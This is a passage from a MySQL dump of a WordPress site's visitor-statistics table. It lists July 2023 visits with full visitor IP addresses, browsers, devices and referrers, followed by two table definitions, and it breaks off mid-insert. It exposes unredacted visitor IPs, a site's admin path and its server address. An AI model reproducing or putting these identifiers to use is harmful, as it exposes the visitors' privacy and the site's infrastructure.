(35507,'2023-07-08','https://ictbank.ir/blog','Chrome','Windows','86.0.0.0','desktop','Unknown','','159.138.48.156','000',0,1,0),
(35508,'2023-07-08','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','216.250.107.226','000',0,3,0),
(35509,'2023-07-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(35510,'2023-07-08','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','45.92.94.221','000',0,2,0),
(35511,'2023-07-08','https://ictbank.ir/blog','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.160.29.66','000',0,9,0),
(35512,'2023-07-08','https://ictbank.ir/blog','Chrome','Windows','29.0.0.0','desktop','Unknown','','99.81.216.206','000',0,1,0),
(35513,'2023-07-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(35514,'2023-07-08','https://design-arena.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','77.74.177.119','000',0,2,0),
(35515,'2023-07-08','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','51.81.167.146','000',0,1,0),
(35516,'2023-07-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(35517,'2023-07-08','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','198.20.87.98','000',0,1,0),
(35518,'2023-07-08','https://ictbank.ir/blog','Chrome','Android','112.0.0.0','mobile:smart','Pixel 6','','39.110.218.101','000',0,2,0),
(35519,'2023-07-08','https://www.google.com/','Chrome','Windows','114.0.0.0','desktop','Unknown','','177.137.88.174','000',0,2,0),
(35520,'2023-07-08','https://ictbank.ir/blog','Firefox','Linux','83.0','desktop','Unknown','','34.254.53.125','000',0,5,0),
(35521,'2023-07-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(35522,'2023-07-08','https://ictbank.ir/sites/nikoocalligraphy/','Samsung Internet','Android','21.0','mobile:smart','Galaxy A53','','5.212.89.183','000',0,2,0),
(35523,'2023-07-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(35524,'2023-07-08','https://ictbank.ir/blog','Chrome','Android','112.0.0.0','mobile:smart','Pixel 6','','133.242.140.127','000',0,2,0),
(35525,'2023-07-08','https://ictbank.ir/blog','Chrome','Android','112.0.0.0','mobile:smart','Pixel 6','','171.244.43.14','000',0,2,0),
(35526,'2023-07-08','https://ictbank.ir/blog','Chrome','OS X','44.0.0.0','desktop','Macintosh','','166.70.59.90','000',0,1,0),
(35527,'2023-07-08','https://ictbank.ir/blog','Chrome','Windows','55.0.0.0','desktop','Unknown','','54.226.66.222','000',0,2,0),
(35528,'2023-07-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,8,0),
(35529,'2023-07-09','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(35530,'2023-07-09','https://students.nikoo-academy.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.93.234','000',0,1,0),
(35531,'2023-07-09','https://students.nikoo-academy.ir/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.86.63','000',0,1,0),
(35532,'2023-07-09','https://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.142','000',0,2,0),
(35533,'2023-07-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(35534,'2023-07-09','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(35535,'2023-07-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(35536,'2023-07-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,4,0),
(35537,'2023-07-09','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(35538,'2023-07-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,4,0),
(35539,'2023-07-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(35540,'2023-07-09','https://ictbank.ir/sites/nikoocalligraphy/','Chrome','Android','107.0.0.0','mobile:smart','Galaxy A50','','2.185.146.113','000',0,1,0),
(35541,'2023-07-09','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(35542,'2023-07-09','https://ictbank.ir/blog','Firefox','Windows','57.0','desktop','Unknown','','167.172.89.156','000',0,2,0),
(35543,'2023-07-09','https://www.google.com/','Chrome','Windows','114.0.0.0','desktop','Unknown','','82.102.12.46','000',0,1,0),
(35544,'2023-07-09','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.214.48','000',0,1,0),
(35545,'2023-07-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(35546,'2023-07-09','https://ictbank.ir/blog','Chrome','Windows','57.0.0.0','desktop','Unknown','','54.80.91.156','000',0,1,0),
(35547,'2023-07-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(35548,'2023-07-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,4,0),
(35549,'2023-07-09','https://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','94.247.172.129','000',0,1,0),
(35550,'2023-07-09','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','62.210.245.181','000',0,2,0),
(35551,'2023-07-09','https://ictbank.ir/blog','Chrome','Windows','2.0.0.0','desktop','Unknown','','188.126.89.92','000',0,2,0),
(35552,'2023-07-09','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','207.90.244.10','000',0,2,0),
(35553,'2023-07-09','https://45.92.94.221/blog','Chrome','Linux','86.0.0','desktop','Unknown','','168.80.174.2','000',0,2,0),
(35554,'2023-07-09','https://ictbank.ir/blog','Firefox','OS X','50.0','desktop','Macintosh','','142.132.250.173','000',0,11,0),
(35555,'2023-07-09','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','18.235.3.141','000',0,1,0),
(35556,'2023-07-09','https://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','183.129.153.157','000',0,2,0),
(35557,'2023-07-09','https://ictbank.ir/blog','Firefox','Windows','17.0','desktop','Unknown','','84.17.59.80','000',0,1,0),
(35558,'2023-07-09','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,1,0),
(35559,'2023-07-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,6,0),
(35560,'2023-07-10','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.76.138','000',0,1,0),
(35561,'2023-07-10','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.6.178','000',0,1,0),
(35562,'2023-07-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(35563,'2023-07-10','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,12,0),
(35564,'2023-07-10','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','185.33.140.204','000',0,1,0),
(35565,'2023-07-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(35566,'2023-07-10','http://design-arena.ir','Chrome','Windows','88.0.0.0','desktop','Unknown','','185.246.188.67','000',0,1,0),
(35567,'2023-07-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(35568,'2023-07-10','https://ictbank.ir/blog','Chrome','Windows','58.0.0.0','desktop','Unknown','','204.236.196.199','000',0,2,0),
(35569,'2023-07-10','https://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(35570,'2023-07-10','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','193.201.8.40','000',0,1,0),
(35571,'2023-07-10','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','93.158.90.147','000',0,1,0),
(35572,'2023-07-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,4,0),
(35573,'2023-07-10','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','37.187.215.244','000',0,1,0),
(35574,'2023-07-10','https://l.instagram.com/','Instagram','Android','290.0.0.0.0','mobile:smart','Galaxy A30','','5.161.140.42','000',0,1,0),
(35575,'2023-07-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(35576,'2023-07-10','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','37.187.215.252','000',0,1,0),
(35577,'2023-07-10','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','79.137.65.46','000',0,1,0),
(35578,'2023-07-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(35579,'2023-07-10','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(35580,'2023-07-10','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.70','000',0,2,0),
(35581,'2023-07-10','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.80','000',0,2,0),
(35582,'2023-07-10','https://ictbank.ir/blog','Chrome','Android','112.0.0.0','mobile:smart','Unknown','','5.115.181.58','000',0,1,0),
(35583,'2023-07-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(35584,'2023-07-10','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(35585,'2023-07-10','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.86.63','000',0,1,0),
(35586,'2023-07-10','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(35587,'2023-07-10','https://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.129.17','000',0,2,0),
(35588,'2023-07-10','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','192.64.4.26','000',0,2,0),
(35589,'2023-07-10','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(35590,'2023-07-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(35591,'2023-07-10','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.77','000',0,1,0),
(35592,'2023-07-10','https://ictbank.ir/blog','Chrome','Windows','113.0.0.0','desktop','Unknown','','23.229.104.2','000',0,3,0),
(35593,'2023-07-10','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','192.71.126.207','000',0,1,0),
(35594,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','193.201.8.40','000',0,7,0),
(35595,'2023-07-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,14,0),
(35596,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','162.55.80.44','000',0,5,0),
(35597,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','104.237.142.57','000',0,1,0),
(35598,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','159.223.181.20','000',0,2,0),
(35599,'2023-07-11','https://ictbank.ir/blog','Firefox','Windows','17.0','desktop','Unknown','','103.216.123.97','000',0,2,0),
(35600,'2023-07-11','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(35601,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','3.219.254.95','000',0,6,0),
(35602,'2023-07-11','https://ictbank.ir/blog','Safari','OS X','10.0.0','desktop','Macintosh','','76.103.233.10','000',0,1,0),
(35603,'2023-07-11','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,3,0),
(35604,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','136.243.76.40','000',0,7,0),
(35605,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','107.178.207.24','000',0,2,0),
(35606,'2023-07-11','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(35607,'2023-07-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(35608,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','144.76.164.141','000',0,2,0),
(35609,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','157.230.219.180','000',0,1,0),
(35610,'2023-07-11','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','176.9.114.107','000',0,1,0),
(35611,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.241.218.178','000',0,1,0),
(35612,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','104.237.136.79','000',0,2,0),
(35613,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','198.58.103.240','000',0,1,0),
(35614,'2023-07-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,8,0),
(35615,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','157.90.176.158','000',0,12,0),
(35616,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,1,0),
(35617,'2023-07-11','https://ictbank.ir/blog','Chrome','Android','87.0.0.0','mobile:smart','Galaxy S10+','','107.178.207.19','000',0,1,0),
(35618,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','157.230.13.113','000',0,1,0),
(35619,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','144.76.95.124','000',0,6,0),
(35620,'2023-07-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,6,0),
(35621,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','3.215.36.60','000',0,2,0),
(35622,'2023-07-11','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,2,0),
(35623,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','137.184.198.215','000',0,1,0),
(35624,'2023-07-11','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(35625,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','81.0.0.0','desktop','Unknown','','45.48.189.202','000',0,2,0),
(35626,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','107.178.207.2','000',0,1,0),
(35627,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','206.81.1.159','000',0,1,0),
(35628,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','92.34.103.51','000',0,1,0),
(35629,'2023-07-11','https://ictbank.ir/hooman/admin/','Chrome','Windows','114.0.0.0','desktop','Unknown','','15.204.52.71','000',0,20,0),
(35630,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','3.87.229.138','000',0,1,0),
(35631,'2023-07-11','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','107.178.207.40','000',0,1,0),
(35632,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','157.230.219.173','000',0,1,0),
(35633,'2023-07-11','https://ictbank.ir/blog','Safari','iOS','5.0.0','tablet','iPad','','173.208.253.82','000',0,1,0),
(35634,'2023-07-11','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','114.0.0.0','desktop','Unknown','','87.107.195.241','000',0,84,0),
(35635,'2023-07-11','https://www.google.com/','Chrome','Android','114.0.0.0','mobile:smart','Unknown','','86.55.27.20','000',0,1,0),
(35636,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','157.90.5.139','000',0,4,0),
(35637,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','107.178.207.46','000',0,1,0),
(35638,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','143.198.175.67','000',0,1,0),
(35639,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','5.124.142.21','000',0,1,0),
(35640,'2023-07-11','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.253.242.138','000',0,1,0),
(35641,'2023-07-11','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','37.187.215.241','000',0,1,0),
(35642,'2023-07-11','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','20.220.119.153','000',0,1,0),
(35643,'2023-07-11','https://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','59.11.23.225','000',0,2,0),
(35644,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','174.138.41.141','000',0,1,0),
(35645,'2023-07-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(35646,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','63.141.226.162','000',0,2,0),
(35647,'2023-07-11','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.190','000',0,2,0),
(35648,'2023-07-11','https://ictbank.ir/blog','Google Search','Unknown','14.0.0.0.','','Unknown','','202.3.76.134','000',0,1,0),
(35649,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,1,0),
(35650,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','137.184.143.25','000',0,1,0),
(35651,'2023-07-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(35652,'2023-07-11','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.238.109.237','000',0,39,0),
(35653,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','18.223.58.204','000',0,1,0),
(35654,'2023-07-11','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','114.55.170.111','000',0,1,0),
(35655,'2023-07-11','https://ictbank.ir/blog','Facebook','iOS','Unknown','mobile:smart','iPhone 13','','173.252.127.11','000',0,1,0),
(35656,'2023-07-11','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','159.65.207.11','000',0,2,0),
(35657,'2023-07-11','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','194.233.160.73','000',0,5,0),
(35659,'2023-07-11','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','206.189.91.129','000',0,2,0),
(35660,'2023-07-11','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','147.182.234.108','000',0,4,0),
(35661,'2023-07-11','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','159.89.182.175','000',0,1,0),
(35667,'2023-07-11','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','167.71.120.72','000',0,2,0),
(35668,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','185.33.140.204','000',0,1,0),
(35669,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.47','000',0,1,0),
(35670,'2023-07-11','https://ictbank.ir/blog','Firefox','Windows','50.0','desktop','Unknown','','185.85.17.117','000',0,1,0),
(35671,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','204.48.20.167','000',0,1,0),
(35672,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.12','000',0,1,0),
(35673,'2023-07-11','https://www.google.com/','Chrome','Android','114.0.0.0','mobile:smart','Unknown','','65.49.38.164','000',0,1,0),
(35674,'2023-07-11','https://ictbank.ir/blog','Unknown','iOS','Unknown','mobile:smart','','','37.169.33.153','000',0,1,0),
(35675,'2023-07-11','https://ictbank.ir/blog','Unknown','iOS','Unknown','mobile:smart','','','178.51.93.150','000',0,2,0),
(35676,'2023-07-11','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','50.116.0.64','000',0,1,0),
(35677,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','213.32.122.82','000',0,1,0),
(35678,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','165.22.5.38','000',0,1,0),
(35679,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','3.220.179.19','000',0,2,0),
(35680,'2023-07-11','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.48','000',0,1,0),
(35681,'2023-07-11','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.7','000',0,2,0),
(35682,'2023-07-11','https://www.google.com/','Chrome','Android','93.0.0.0','mobile:smart','Galaxy A51','','158.58.3.159','000',0,1,0),
(35683,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','17.241.219.84','000',0,1,0),
(35684,'2023-07-11','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(35685,'2023-07-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','159.69.13.232','000',0,1,0),
(35686,'2023-07-12','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','157.90.5.139','000',0,4,0),
(35687,'2023-07-12','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','136.243.76.40','000',0,3,0),
(35688,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','3.219.254.95','000',0,1,0),
(35689,'2023-07-12','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','','','166.70.59.90','000',0,1,0),
(35690,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','17.241.75.173','000',0,1,0),
(35691,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','167.172.149.104','000',0,1,0),
(35692,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','179.43.191.18','000',0,1,0),
(35693,'2023-07-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(35694,'2023-07-12','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','174.28.179.220','000',0,114,0),
(35695,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','107.178.205.90','000',0,1,0),
(35696,'2023-07-12','https://ictbank.ir/blog','Chrome','OS X','104.0.0.0','desktop','Macintosh','','54.144.200.109','000',0,3,0),
(35697,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','104.237.142.57','000',0,1,0),
(35698,'2023-07-12','https://ictbank.ir/blog','Unknown','iOS','Unknown','mobile:smart','','','51.81.243.119','000',0,1,0),
(35699,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','17.241.75.163','000',0,1,0),
(35700,'2023-07-12','https://ictbank.ir/blog','Firefox','OS X','81.0','desktop','Macintosh','','173.208.253.82','000',0,1,0),
(35701,'2023-07-12','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','157.90.176.158','000',0,3,0),
(35702,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','157.230.13.113','000',0,1,0),
(35703,'2023-07-12','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','79.137.65.46','000',0,1,0),
(35704,'2023-07-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(35705,'2023-07-12','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.6','000',0,2,0),
(35706,'2023-07-12','https://45.92.94.221:443/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','104.140.148.106','000',0,2,0),
(35707,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','3.221.101.141','000',0,2,0),
(35708,'2023-07-12','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','51.159.20.37','000',0,4,0),
(35709,'2023-07-12','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','192.42.116.203','000',0,1,0),
(35710,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','107.178.207.26','000',0,1,0),
(35711,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','17.241.219.157','000',0,1,0),
(35712,'2023-07-12','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','128.90.164.34','000',0,10,0),
(35713,'2023-07-12','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(35714,'2023-07-12','https://ictbank.ir/blog','Chrome','Android','114.0.0.0','tablet','Unknown','','43.134.22.249','000',0,3,0),
(35715,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','157.230.13.108','000',0,1,0),
(35716,'2023-07-12','https://ictbank.ir/blog','Chrome','Windows','113.0.0.0','desktop','Unknown','','69.197.131.210','000',0,2,0),
(35717,'2023-07-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','185.33.140.204','000',0,1,0);
/*!40000 ALTER TABLE `wp_statistics_visitor` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_statistics_visitor_relationships`
--
DROP TABLE IF EXISTS `wp_statistics_visitor_relationships`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_statistics_visitor_relationships` (
`ID` bigint(20) NOT NULL AUTO_INCREMENT,
`visitor_id` bigint(20) NOT NULL,
`page_id` bigint(20) NOT NULL,
`date` datetime NOT NULL,
PRIMARY KEY (`ID`),
KEY `visitor_id` (`visitor_id`),
KEY `page_id` (`page_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci ROW_FORMAT=COMPACT;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_statistics_visitor_relationships`
--
LOCK TABLES `wp_statistics_visitor_relationships` WRITE;
/*!40000 ALTER TABLE `wp_statistics_visitor_relationships` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_statistics_visitor_relationships` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_term_relationships`
--
DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_term_relationships` (
`object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`term_order` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`object_id`,`term_taxonomy_id`),
KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_term_relationships`
--
LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES
(27,1,0),
(27,8,0),
(27,9,0),
(56,2,0),
